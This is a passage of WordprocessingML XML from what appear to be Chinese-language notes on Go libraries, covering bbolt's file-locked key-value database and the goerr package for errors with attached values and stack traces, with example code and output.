        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AFBC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://pkg.go.dev/go.etcd.io/bbolt#section-readme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A101C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2658BD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该库是介绍链接中提到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社区的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的分叉，是对后者的优化。主要用于存储键值对问题。可以理解为，单纯存储键值对的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E2545" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D98929E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bolt </w:t>
      </w:r>
      <w:r>
        <w:t>获取数据文件的文件锁，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>多个进程不能同时打开同一个数据库</w:t>
      </w:r>
      <w:r>
        <w:t>。打开一个已经打开的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bolt </w:t>
      </w:r>
      <w:r>
        <w:t>数据库将导致它挂起，直到另一个进程将其关闭。为防止无限期等待，您可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将超时选项</w:t>
      </w:r>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Open()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413DAD56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762F9255" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import bolt "go.etcd.io/bbolt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DBBC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE935D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>db, err := bolt.Open(path, 0666, nil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2E7DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C463865" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE411F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B453894" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>defer db.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998320C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC4DD9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>携带读取超时参数的Open：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41768F33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">db, err := bolt.Open("my.db", 0600, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp;bolt.Options{Timeout: 1 * time.Second}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C607615" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9F0CAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB604DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E57F15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33491894" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1640B857" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEC9B86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F174D2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="374" w:name="_Toc159779825"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/m-mizutani/goerr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：跟踪变量及堆栈错误</w:t>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
    </w:p>
    <w:p w14:paraId="4BF8ADF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/m-mizutani/goerr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E367E73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9DD194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟踪变量错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DDF66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F03494" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351DFA84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A20713E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"errors"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A548D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E745FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77746FAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/m-mizutani/goerr"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ECE9E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D55932" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACBA1B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func someAction(input string) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106C491" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if input != "OK" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAFAA3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goerr.New</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>("input is not OK")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.With</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>("input", input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.With</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>("time", time.Now())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D22F5E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F54B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A0B442" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31303D64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AFFC9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B2AB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := someAction("ng"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421945B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var goErr *goerr.Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6745288B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if errors.As(err, &amp;goErr) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63315341" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for k, v :=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> range goErr.Values() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653E0FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Printf("%s = %v\n", k, v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB5E32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028969A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5E136" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Fatalf("Error: %+v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BDB667" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B5979" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55743872" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A63DCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下为执行命令后的输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E2A95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2022/05/14 10:28:08 input = ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D45DAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2022/05/14 10:28:08 time = 2022-05-14 10:28:08.452831 +0900 JST m=+0.000483668</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AEE52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2022/05/14 10:28:08 Error: input is not OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235A146" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>main.someAction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78B9F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        /xxx/goerr/examples/basic/main.go:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08833A23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>main.main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59F86E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        /xxx/goerr/examples/basic/main.go:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C51C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>runtime.main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA1383" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        /usr/local/go/src/runtime/proc.go:250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB68B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>runtime.goexit</w:t>
      </w:r>
    </w:p>
